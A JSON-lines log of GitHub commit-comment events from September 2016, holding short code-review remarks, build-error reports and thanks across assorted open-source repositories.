{"id":"4545649817","type":"CommitCommentEvent","actor":{"login":"banghasan"},"repo":{"name":"hakimrie/alQuran-Translations"},"payload":{"comment":{"id":18976772,"position":null,"line":null,"path":null,"commit_id":"edf95fba8c98d4678ac4239507af62636ce32eb9","created_at":"2016-09-11T11:06:23Z","updated_at":"2016-09-11T11:06:23Z","body":"cmungudh!"}},"created_at":"2016-09-11T11:06:23Z"}
{"id":"4545652001","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"trufont/trufont"},"payload":{"comment":{"id":18976774,"position":null,"line":null,"path":null,"commit_id":"457111e6d1402acc7fe4842736e89ebc44744eef","created_at":"2016-09-11T11:08:13Z","updated_at":"2016-09-11T11:08:13Z","body":"Yeah, we no longer need that."}},"created_at":"2016-09-11T11:08:13Z"}
{"id":"4545656082","type":"CommitCommentEvent","actor":{"login":"marinintim"},"repo":{"name":"facebookincubator/create-react-app"},"payload":{"comment":{"id":18976776,"position":null,"line":null,"path":null,"commit_id":"66702915e6a8cd1a53055a8f83d09cb80ce4b68e","created_at":"2016-09-11T11:11:35Z","updated_at":"2016-09-11T11:11:35Z","body":":+1: "}},"created_at":"2016-09-11T11:11:35Z"}
{"id":"4545656469","type":"CommitCommentEvent","actor":{"login":"alieydi16"},"repo":{"name":"alieydi/alizedspam"},"payload":{"comment":{"id":18976777,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T11:11:53Z","updated_at":"2016-09-11T11:11:53Z","body":"11121314"}},"created_at":"2016-09-11T11:11:53Z"}
{"id":"4545656720","type":"CommitCommentEvent","actor":{"login":"AnasQiblawi"},"repo":{"name":"throwaway404/YouNow_Downloader-mac-linux"},"payload":{"comment":{"id":18976778,"position":null,"line":null,"path":null,"commit_id":"37a2cff7725b65517b9c4e63843994ad8fbbae36","created_at":"2016-09-11T11:12:09Z","updated_at":"2016-09-11T11:12:09Z","body":"thanks alot @throwaway404 \r\n\r\ncan you please tell me how could you know the new API link ?\r\n\r\n:: old\r\n:: http://www.younow.com/php/api/broadcast/info/user=%user_name%\r\n::New\r\n:: http://bcm.younow.com/broadcast/info/user=%user_name%\r\n"}},"created_at":"2016-09-11T11:12:09Z"}
{"id":"4545657887","type":"CommitCommentEvent","actor":{"login":"fluxer"},"repo":{"name":"clearkimura/Customizer"},"payload":{"comment":{"id":18976779,"position":null,"line":null,"path":null,"commit_id":"cefca0d5504f02cee3db14b6f134e5181919053c","created_at":"2016-09-11T11:13:09Z","updated_at":"2016-09-11T11:13:09Z","body":"@clearkimura Yep, you can delete it."}},"created_at":"2016-09-11T11:13:09Z"}
{"id":"4545658905","type":"CommitCommentEvent","actor":{"login":"Lyrics1"},"repo":{"name":"Lyrics1/learn_git"},"payload":{"comment":{"id":18976780,"position":null,"line":null,"path":null,"commit_id":"91042c6359107ca188137e7cca4564796769974e","created_at":"2016-09-11T11:14:01Z","updated_at":"2016-09-11T11:14:01Z","body":"是链表的拆分，与第一个"}},"created_at":"2016-09-11T11:14:01Z"}
{"id":"4545658958","type":"CommitCommentEvent","actor":{"login":"Mr-Kumar-Abhishek"},"repo":{"name":"Mr-Kumar-Abhishek/twentysixteen-o"},"payload":{"comment":{"id":18976781,"position":null,"line":null,"path":null,"commit_id":"161a518bd406edeea805382ad07c1646d76b6305","created_at":"2016-09-11T11:14:04Z","updated_at":"2016-09-11T11:14:04Z","body":"Deleting this premature commit , I suppose it would take a while for me to get my head back to this."}},"created_at":"2016-09-11T11:14:04Z"}
{"id":"4545663159","type":"CommitCommentEvent","actor":{"login":"AlissaVelia"},"repo":{"name":"AlissaVelia/DeliveryOrderOnlineShop"},"payload":{"comment":{"id":18976782,"position":7,"line":13,"path":"VELIA.md","commit_id":"f3dc1ec82353bbed27c790fa4b34915e3db37377","created_at":"2016-09-11T11:17:44Z","updated_at":"2016-09-11T11:17:44Z","body":"![on](https://cloud.githubusercontent.com/assets/22128652/18416708/d71e934e-7845-11e6-8fa7-d946f8b8bda1.PNG) "}},"created_at":"2016-09-11T11:17:44Z"}
{"id":"4545664084","type":"CommitCommentEvent","actor":{"login":"AlissaVelia"},"repo":{"name":"AlissaVelia/DeliveryOrderOnlineShop"},"payload":{"comment":{"id":18976783,"position":null,"line":null,"path":null,"commit_id":"f3dc1ec82353bbed27c790fa4b34915e3db37377","created_at":"2016-09-11T11:18:39Z","updated_at":"2016-09-11T11:18:39Z","body":"![line](https://cloud.githubusercontent.com/assets/22128652/18416905/1cce6f94-784c-11e6-8ce2-e39aee01488d.PNG)\r\n"}},"created_at":"2016-09-11T11:18:39Z"}
{"id":"4545664164","type":"CommitCommentEvent","actor":{"login":"markusthoemmes"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":18976784,"position":11,"line":52,"path":"gradle/docker.gradle","commit_id":"de46808ee4fa1974c3eeeeef267ff197b8e889ff","created_at":"2016-09-11T11:18:43Z","updated_at":"2016-09-11T11:18:43Z","body":"Wrong indentation."}},"created_at":"2016-09-11T11:18:43Z"}
{"id":"4545664224","type":"CommitCommentEvent","actor":{"login":"AlissaVelia"},"repo":{"name":"AlissaVelia/DeliveryOrderOnlineShop"},"payload":{"comment":{"id":18976785,"position":7,"line":13,"path":"VELIA.md","commit_id":"f3dc1ec82353bbed27c790fa4b34915e3db37377","created_at":"2016-09-11T11:18:48Z","updated_at":"2016-09-11T11:18:48Z","body":"![line](https://cloud.githubusercontent.com/assets/22128652/18416905/1cce6f94-784c-11e6-8ce2-e39aee01488d.PNG)\r\n"}},"created_at":"2016-09-11T11:18:48Z"}
{"id":"4545664391","type":"CommitCommentEvent","actor":{"login":"nok"},"repo":{"name":"mayaman/p5js-website"},"payload":{"comment":{"id":18976786,"position":67,"line":230,"path":"src/assets/js/init.js","commit_id":"c3a9bba6a1c56c62ad6ffd98a2dda26a246eb24a","created_at":"2016-09-11T11:18:58Z","updated_at":"2016-09-11T11:18:58Z","body":"Alternatively we can use a temporary style:\r\n\r\n```\r\n#i18n-btn { \r\n  /* ... */\r\n  display: none !important;\r\n}\r\n```\r\n\r\nThe JavaScript solution can effect a short visible flicker effect. But in general I don't like the `!important` statemantes, because it's more a hack to change the hierarchy of the clean styles rules. But in this case it would be fine, because it's temporary. ;-)"}},"created_at":"2016-09-11T11:18:58Z"}
{"id":"4545664872","type":"CommitCommentEvent","actor":{"login":"mchome"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18976787,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-11T11:19:22Z","updated_at":"2016-09-11T11:19:22Z","body":"登陆出错确实是mkpkt有差别，建议你放个5.21的数据包"}},"created_at":"2016-09-11T11:19:22Z"}
{"id":"4545667053","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18976789,"position":24,"line":288,"path":"Cabal/Distribution/Simple/GHC.hs","commit_id":"e7d2a62c84d71ca565d9af1f4d063330ea48da5f","created_at":"2016-09-11T11:21:15Z","updated_at":"2016-09-11T11:21:15Z","body":"I would love it if there was a log message (debug) which let us know that GHC_PACKAGE_PATH was found, here is its value, and how we were affected by it."}},"created_at":"2016-09-11T11:21:15Z"}
{"id":"4545667653","type":"CommitCommentEvent","actor":{"login":"Hoon-Ki"},"repo":{"name":"Hoon-Ki/CADL"},"payload":{"comment":{"id":18976790,"position":null,"line":null,"path":null,"commit_id":"1817702d820649583518f2403f9af7e020be0934","created_at":"2016-09-11T11:21:51Z","updated_at":"2016-09-11T11:21:51Z","body":"session 3,4"}},"created_at":"2016-09-11T11:21:51Z"}
{"id":"4545668144","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976791,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T11:22:15Z","updated_at":"2016-09-11T11:22:15Z","body":"you could do:\r\n```\r\nshort addrem[8] = {0}\r\nfor (unsigned short i = 0; i < DEV_Joystick::JOYINDEX_MAX; ++i) {\r\n    updatePythonJoysticks(i, addrem[i]);\r\n}\r\n```\r\nAnd then in DEV_Joystick::HandleEvents:\r\n- return true only when you noticed an add or remove\r\n- remove `index` array\r\n- assign addrem with joystick index"}},"created_at":"2016-09-11T11:22:15Z"}
{"id":"4545670502","type":"CommitCommentEvent","actor":{"login":"Recall703"},"repo":{"name":"Recall703/OOP_Assignment"},"payload":{"comment":{"id":18976797,"position":63,"line":63,"path":"Brain.java","commit_id":"fa742710ab3375a2c3faf97cf0ccc456f7d94a23","created_at":"2016-09-11T11:24:17Z","updated_at":"2016-09-11T11:24:17Z","body":"asdasdasdasdad"}},"created_at":"2016-09-11T11:24:17Z"}
{"id":"4545670850","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976798,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T11:24:38Z","updated_at":"2016-09-11T11:24:38Z","body":"also you can keep the short for the addrem list and use 0 when nothing happen, 1 for add and 2 for remove. If you want to optimize the process with conditions."}},"created_at":"2016-09-11T11:24:38Z"}
{"id":"4545670990","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":18976799,"position":null,"line":null,"path":null,"commit_id":"0ad6c3c50ae280c456b212ae4fe6283f67c78331","created_at":"2016-09-11T11:24:46Z","updated_at":"2016-09-11T11:24:46Z","body":"Previous comment revised by https://github.com/networkimprov/arch-packages/issues/39#issuecomment-246157927"}},"created_at":"2016-09-11T11:24:46Z"}
{"id":"4545671377","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976800,"position":5,"line":5,"path":"login.html","commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T11:25:09Z","updated_at":"2016-09-11T11:25:09Z","body":"Let's fix the indentation on here and on the next line."}},"created_at":"2016-09-11T11:25:09Z"}
{"id":"4545672753","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976801,"position":18,"line":18,"path":"login.html","commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T11:26:27Z","updated_at":"2016-09-11T11:26:27Z","body":"```html\r\n  <button id=\"button1\">Sign Up</button>\r\n```\r\n\r\nYou don't need the `onclick` attribute since you never assigned it a value. Meaning there was no `= \"someFunction()\"`.\r\n\r\nYou also had an extra `= \"button1\"` at the end that was redundant. There was no attribute given to it, the left hand side of the `=`."}},"created_at":"2016-09-11T11:26:27Z"}
{"id":"4545673057","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976802,"position":36,"line":36,"path":"login.html","commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T11:26:44Z","updated_at":"2016-09-11T11:26:44Z","body":"Missing semicolon."}},"created_at":"2016-09-11T11:26:44Z"}
{"id":"4545674061","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976803,"position":14,"line":39,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T11:27:41Z","updated_at":"2016-09-11T11:27:41Z","body":"Agree, second part was overlooked (copy/paste). Edited in latest line of commits (ID: b87afcc3cce5b963287c8e8f1db24b001a2d210d) to:\r\nFor all crew positions $p_{\\tiny i}$ on a vessel $V_{\\tiny x}$, each position $p_i$ at a point in time $t$, has its own subdomain of $D$, given as $D_{\\tiny it}$."}},"created_at":"2016-09-11T11:27:41Z"}
{"id":"4545674294","type":"CommitCommentEvent","actor":{"login":"alieydi16"},"repo":{"name":"alieydi/alizedspam"},"payload":{"comment":{"id":18976804,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T11:27:56Z","updated_at":"2016-09-11T11:27:56Z","body":"203411267"}},"created_at":"2016-09-11T11:27:56Z"}
{"id":"4545674537","type":"CommitCommentEvent","actor":{"login":"shreyasp"},"repo":{"name":"shreyasp/bench"},"payload":{"comment":{"id":18976805,"position":5,"line":16,"path":".travis.yml","commit_id":"9c0cfd6c6fb2b46fa6e75fd1944cca70739e68f7","created_at":"2016-09-11T11:28:10Z","updated_at":"2016-09-11T11:28:10Z","body":"##### Testing Script on Travis\r\n```\r\n--repo-url <repo_url>  --bench-branch <branch_name>\r\n```\r\n"}},"created_at":"2016-09-11T11:28:10Z"}
{"id":"4545674663","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976806,"position":34,"line":34,"path":"login.html","commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T11:28:17Z","updated_at":"2016-09-11T11:28:17Z","body":"Okay, so this is something similar we were talking about in class.`suEmail` is a variable, but it hasn't been declared yet. For a variable to be declared, you need to see the word `var` in front of it. Where do you see `var suEmail`? (It's on line 37). This is on line 34. Therefore this will actually return `undefined` sine it doesn't exist. "}},"created_at":"2016-09-11T11:28:17Z"}
{"id":"4545675974","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976807,"position":37,"line":37,"path":"login.html","commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T11:29:24Z","updated_at":"2016-09-11T11:29:24Z","body":"Okay, so this line is using jQuery (`$`) to find an input with an `id` of `suEmail`. Once it has the input, it will get the value of the input by using the function `.val()` and assigning it (`=`) to the variable `suEmail`.\r\n\r\nDoes that make sense?"}},"created_at":"2016-09-11T11:29:24Z"}
{"id":"4545676058","type":"CommitCommentEvent","actor":{"login":"larsommen"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976808,"position":14,"line":39,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T11:29:28Z","updated_at":"2016-09-11T11:29:28Z","body":"Agree"}},"created_at":"2016-09-11T11:29:28Z"}
{"id":"4545676216","type":"CommitCommentEvent","actor":{"login":"nok"},"repo":{"name":"mayaman/p5js-website"},"payload":{"comment":{"id":18976809,"position":41,"line":204,"path":"src/assets/js/init.js","commit_id":"c3a9bba6a1c56c62ad6ffd98a2dda26a246eb24a","created_at":"2016-09-11T11:29:37Z","updated_at":"2016-09-11T11:29:37Z","body":"`set tagline` is in the scope of the `onload` event (`window.addEventListener('load', function() { /* ... */  });`). The code in this scope will be executed after the page is loaded completely (all images, ...). Because of that I put the loading of the third party tracking script to the end. It would just slow the page speed down.\r\n\r\nWe should replace the `set tagline` code out of this scope.\r\n\r\nIn addition we can handle the logic in `set tagline` with CSS classes in a future update. ;-)"}},"created_at":"2016-09-11T11:29:37Z"}
{"id":"4545677829","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18976810,"position":null,"line":null,"path":null,"commit_id":"a8e22ea5e051f07febc19aba859ca431909cc8d6","created_at":"2016-09-11T11:30:58Z","updated_at":"2016-09-11T11:30:58Z","body":"These are more intuitive results. Are they for endgame or midgame ?"}},"created_at":"2016-09-11T11:30:58Z"}
{"id":"4545678471","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976812,"position":null,"line":null,"path":null,"commit_id":"83580fcfb48b3949b87ddc1c50a469955d5f23b4","created_at":"2016-09-11T11:31:35Z","updated_at":"2016-09-11T11:31:35Z","body":"@erinl1 take a look at the comments I left you and see if you can make some changes."}},"created_at":"2016-09-11T11:31:35Z"}
{"id":"4545678706","type":"CommitCommentEvent","actor":{"login":"ChessQuake"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18976813,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-11T11:31:49Z","updated_at":"2016-09-11T11:31:49Z","body":"Outstanding!"}},"created_at":"2016-09-11T11:31:49Z"}
{"id":"4545681255","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18976814,"position":null,"line":null,"path":null,"commit_id":"a8e22ea5e051f07febc19aba859ca431909cc8d6","created_at":"2016-09-11T11:34:11Z","updated_at":"2016-09-11T11:34:11Z","body":"There are for the whole nodes of bench. Could you maybe suggest a more useful threshold than PHASE_MIDGAME to split them?"}},"created_at":"2016-09-11T11:34:11Z"}
{"id":"4545682132","type":"CommitCommentEvent","actor":{"login":"srisurya95"},"repo":{"name":"AOSP-RRO/platform_build"},"payload":{"comment":{"id":18976817,"position":null,"line":null,"path":null,"commit_id":"3418fe3a12ac0fc6800aaeca70f3e06d5d4dc4de","created_at":"2016-09-11T11:34:56Z","updated_at":"2016-09-11T11:34:56Z","body":"@jancsessz I personally use 1.7 for Marshmallow and one of my friends confirmed that he used java8 and ROM was built fine with this commit "}},"created_at":"2016-09-11T11:34:56Z"}
{"id":"4545683737","type":"CommitCommentEvent","actor":{"login":"YingEra"},"repo":{"name":"YingEra/Spring-Boot-Learn"},"payload":{"comment":{"id":18976818,"position":2,"line":2,"path":"test.txt","commit_id":"3ad8e99a0f665bd2c83a4a2f064fdb4cf2ed5cc3","created_at":"2016-09-11T11:36:23Z","updated_at":"2016-09-11T11:36:23Z","body":"可以有"}},"created_at":"2016-09-11T11:36:23Z"}
{"id":"4545689672","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18976819,"position":null,"line":null,"path":null,"commit_id":"a8e22ea5e051f07febc19aba859ca431909cc8d6","created_at":"2016-09-11T11:41:44Z","updated_at":"2016-09-11T11:41:44Z","body":"(Surely I was overcompensating in the quadratic imbalance table though)"}},"created_at":"2016-09-11T11:41:44Z"}
{"id":"4545691032","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18976820,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-11T11:42:59Z","updated_at":"2016-09-11T11:42:59Z","body":"It is simple, really. Linkify must be applied after the name highlight. This will break the linkification, but the name wont scramble the link any longer. And it is an edge case that will most likely not affect most users."}},"created_at":"2016-09-11T11:42:59Z"}
{"id":"4545691833","type":"CommitCommentEvent","actor":{"login":"MichelML"},"repo":{"name":"MichelML/gen"},"payload":{"comment":{"id":18976822,"position":null,"line":null,"path":null,"commit_id":"472dd97f354e8573032845eb474db423013fd9ef","created_at":"2016-09-11T11:43:43Z","updated_at":"2016-09-11T11:43:43Z","body":"rather a **refactor** commit than a **fix** commit"}},"created_at":"2016-09-11T11:43:43Z"}
{"id":"4545692258","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"CyanogenMod/android_frameworks_base"},"payload":{"comment":{"id":18976824,"position":null,"line":null,"path":null,"commit_id":"42fbe21ac147f4bcf594658c0ff302708328f04f","created_at":"2016-09-11T11:44:08Z","updated_at":"2016-09-11T11:44:08Z","body":"@cyanogen something is broken\r\norg.cyanogenmod.hardware.util cannot be resolved"}},"created_at":"2016-09-11T11:44:08Z"}
{"id":"4545693692","type":"CommitCommentEvent","actor":{"login":"fabricionaweb"},"repo":{"name":"mnzt/diet-jade"},"payload":{"comment":{"id":18976825,"position":20,"line":20,"path":"index.js","commit_id":"d6231062aa6eeb37f9b96ac87a2415368fa948d3","created_at":"2016-09-11T11:45:15Z","updated_at":"2016-09-11T11:45:15Z","body":"It would be better without this log"}},"created_at":"2016-09-11T11:45:15Z"}
{"id":"4545694891","type":"CommitCommentEvent","actor":{"login":"salamaprosper"},"repo":{"name":"salamaprosper/prospersal"},"payload":{"comment":{"id":18976826,"position":null,"line":null,"path":null,"commit_id":"07e5f5755d88319aacb1a718eaadc697fadc4da3","created_at":"2016-09-11T11:46:13Z","updated_at":"2016-09-11T11:46:13Z","body":"am just great for this but i need a little explaination for how this things works thank you\r\n"}},"created_at":"2016-09-11T11:46:13Z"}
{"id":"4545694935","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18976827,"position":5,"line":278,"path":"cabal-install/tests/UnitTests/Distribution/Solver/Modular/DSL.hs","commit_id":"c36d11ff2e94458a51ae69368c84f1549ddba09c","created_at":"2016-09-11T11:46:14Z","updated_at":"2016-09-11T11:46:14Z","body":"Thanks, you're right."}},"created_at":"2016-09-11T11:46:14Z"}
{"id":"4545696967","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18976828,"position":21,"line":223,"path":"cabal-install/tests/UnitTests/Distribution/Solver/Modular/QuickCheck.hs","commit_id":"c36d11ff2e94458a51ae69368c84f1549ddba09c","created_at":"2016-09-11T11:47:58Z","updated_at":"2016-09-11T11:47:58Z","body":"So, if we have a duplicate ComponentLib, it won't get nubbed out? Is there any reason to do it specifically this way?"}},"created_at":"2016-09-11T11:47:58Z"}
{"id":"4545697465","type":"CommitCommentEvent","actor":{"login":"alieydi16"},"repo":{"name":"alieydi/alizedspam"},"payload":{"comment":{"id":18976829,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T11:48:25Z","updated_at":"2016-09-11T11:48:25Z","body":"203411267"}},"created_at":"2016-09-11T11:48:25Z"}
{"id":"4545698730","type":"CommitCommentEvent","actor":{"login":"iMaruf"},"repo":{"name":"iMaruf/JavaBasicLearnning"},"payload":{"comment":{"id":18976831,"position":null,"line":null,"path":null,"commit_id":"41e0a832a34048b4328c9276fb1bd63ae93884e8","created_at":"2016-09-11T11:49:35Z","updated_at":"2016-09-11T11:49:35Z","body":"Fixed all errors."}},"created_at":"2016-09-11T11:49:35Z"}
{"id":"4545699290","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"bgrainger/Pomelo.EntityFrameworkCore.MySql"},"payload":{"comment":{"id":18976832,"position":null,"line":null,"path":null,"commit_id":"0e2a88a0612f439a9414d6b997b795ec77bc5a09","created_at":"2016-09-11T11:50:08Z","updated_at":"2016-09-11T11:50:08Z","body":"> Can we do something smarter (than using reflection) here\r\n\r\n@bgrainger I think we can.  I'll merge this in to my pr later today and play around with it."}},"created_at":"2016-09-11T11:50:08Z"}
{"id":"4545703182","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"trufont/trufont"},"payload":{"comment":{"id":18976835,"position":null,"line":null,"path":null,"commit_id":"457111e6d1402acc7fe4842736e89ebc44744eef","created_at":"2016-09-11T11:53:26Z","updated_at":"2016-09-11T11:53:26Z","body":"Ok, I removed first line with fc877b6aef623b3a13fb534fda0783267b00340a\r\nAlso, I dropped cython from the .travis.yml setup (093053f9789a474e6c376fa50a58932d5a939f3e)"}},"created_at":"2016-09-11T11:53:26Z"}
{"id":"4545705068","type":"CommitCommentEvent","actor":{"login":"alieydi16"},"repo":{"name":"alieydi/alizedspam"},"payload":{"comment":{"id":18976839,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T11:55:03Z","updated_at":"2016-09-11T11:55:03Z","body":"203411267"}},"created_at":"2016-09-11T11:55:03Z"}
{"id":"4545705810","type":"CommitCommentEvent","actor":{"login":"michaloo"},"repo":{"name":"hull-ships/hull-hubspot"},"payload":{"comment":{"id":18976840,"position":null,"line":null,"path":null,"commit_id":"31e0e97cbec08e4fe1b5a3d7c0e959c6bcd82f06","created_at":"2016-09-11T11:55:47Z","updated_at":"2016-09-11T11:55:47Z","body":"For now it would be enough. Tomorrow I will move this action to Queue(Worker)App\r\n\r\nSo in the WebApp action we would have just the queue method:\r\n`return req.shipApp.queueAgent.create(\"checkTokenJob\")`.\r\n\r\nand then add new controller method for the background job:\r\n```\r\n  checkTokenJob(req) {\r\n    return req.shipApp.hubspotAgent.checkToken();\r\n  }\r\n```"}},"created_at":"2016-09-11T11:55:47Z"}
{"id":"4545707837","type":"CommitCommentEvent","actor":{"login":"jturney"},"repo":{"name":"jturney/levmar"},"payload":{"comment":{"id":18976841,"position":88,"line":88,"path":"cmake/Psi4Macros.cmake","commit_id":"21231f907911e0a8322cdc7c539b58a2c15ebb0f","created_at":"2016-09-11T11:57:37Z","updated_at":"2016-09-11T11:57:37Z","body":"I've updated it to match libefp's. Thanks!"}},"created_at":"2016-09-11T11:57:37Z"}
{"id":"4545712488","type":"CommitCommentEvent","actor":{"login":"bk79"},"repo":{"name":"iNavFlight/inav"},"payload":{"comment":{"id":18976845,"position":null,"line":null,"path":null,"commit_id":"79cf530b97960d9138646744b5d29d6ac00729e7","created_at":"2016-09-11T12:01:17Z","updated_at":"2016-09-11T12:01:17Z","body":"@DzikuVx  @digitalentity little update, on my findings, I think I've find something stange:\r\n1) the telemetry doens't get synchronized unless I open at least once Inav configurator (just give an initial bump and then nothing)\r\n2) telemTemperature1 from\r\n\"sendIbusMeasurement(address, (uint16_t) telemTemperature1 + IBUS_TEMPERATURE_OFFSET);\" is giving always 0 (at least on MPU 9150 of the sparky FC).  I've tried using (baroTemperature/10)  and it works.\r\nAdditionally I've changed rcCommand[THROTTLE] with getEstimatedActualPosition(Z) at least we have a useful parameter and it works"}},"created_at":"2016-09-11T12:01:17Z"}
{"id":"4545718109","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":18976850,"position":13,"line":50,"path":"connector_prestashop_catalog_manager/product.py","commit_id":"cf9e7d971a9b4c23884843429bfd0526c55427b8","created_at":"2016-09-11T12:05:42Z","updated_at":"2016-09-11T12:05:42Z","body":"Why do you remove this?"}},"created_at":"2016-09-11T12:05:42Z"}
{"id":"4545718692","type":"CommitCommentEvent","actor":{"login":"Sreenietla"},"repo":{"name":"Sreenietla/IOT_Water_Management"},"payload":{"comment":{"id":18976853,"position":null,"line":null,"path":null,"commit_id":"c123b59d05d9985a679380761679f5b0f09f673a","created_at":"2016-09-11T12:06:13Z","updated_at":"2016-09-11T12:06:13Z","body":"Mobile notifications can be activated using free notification services such as Pushetta. Refer to the section for more details on registering for Pushetta"}},"created_at":"2016-09-11T12:06:13Z"}
{"id":"4545718878","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"PomeloFoundation/Pomelo.EntityFrameworkCore.MySql"},"payload":{"comment":{"id":18976854,"position":46,"line":46,"path":"src/Pomelo.EntityFrameworkCore.MySql/Storage/Internal/SynchronizedMySqlDataReader.cs","commit_id":"7354ecf6dbf211721104943f878c07ad53c52581","created_at":"2016-09-11T12:06:24Z","updated_at":"2016-09-11T12:06:24Z","body":"This will throw an Exception for Json Columns until Json support is added to MySqlConnector"}},"created_at":"2016-09-11T12:06:24Z"}
{"id":"4545718918","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":18976855,"position":27,"line":56,"path":"connector_prestashop_catalog_manager/wizard/export_multiple_products_view.xml","commit_id":"cf9e7d971a9b4c23884843429bfd0526c55427b8","created_at":"2016-09-11T12:06:25Z","updated_at":"2016-09-11T12:06:25Z","body":"Don't comment, but remove if not needed anymore"}},"created_at":"2016-09-11T12:06:25Z"}
{"id":"4545721842","type":"CommitCommentEvent","actor":{"login":"lucasbhjf"},"repo":{"name":"leocaseiro/WordPress-Plugin-Custom-Options-Plus"},"payload":{"comment":{"id":18976860,"position":null,"line":null,"path":null,"commit_id":"97a7b35a4529c847b4c810b7ed029ab6d1458134","created_at":"2016-09-11T12:09:02Z","updated_at":"2016-09-11T12:09:02Z","body":"@bitcoincoltd, the array using brackets looks like a php version 5.4 feature(the test in phptester.com failed in 5.3), if you want to use the brackets arrays, update php to 5.6, but the core of Wordpress was written using array() because in the past is the only way to use arrays like that. "}},"created_at":"2016-09-11T12:09:02Z"}
{"id":"4545722971","type":"CommitCommentEvent","actor":{"login":"Alx31"},"repo":{"name":"TipsyOs/frameworks_opt_telephony"},"payload":{"comment":{"id":18976862,"position":null,"line":null,"path":null,"commit_id":"76d3e8f11fc84f198f2abbebd9195920336abc56","created_at":"2016-09-11T12:10:03Z","updated_at":"2016-09-11T12:10:03Z","body":"it breaks build here.... @limjh16\r\n\"frameworks/opt/telephony/src/java/com/android/internal/telephony/RIL.java:298: error: variable mQANElements is already defined in class RIL\r\n    protected int mQANElements = 4;\""}},"created_at":"2016-09-11T12:10:03Z"}
{"id":"4545724024","type":"CommitCommentEvent","actor":{"login":"SpeedyDanny"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":18976864,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-11T12:10:54Z","updated_at":"2016-09-11T12:10:54Z","body":"these are the codes for second server? (the sync thing in races)"}},"created_at":"2016-09-11T12:10:54Z"}
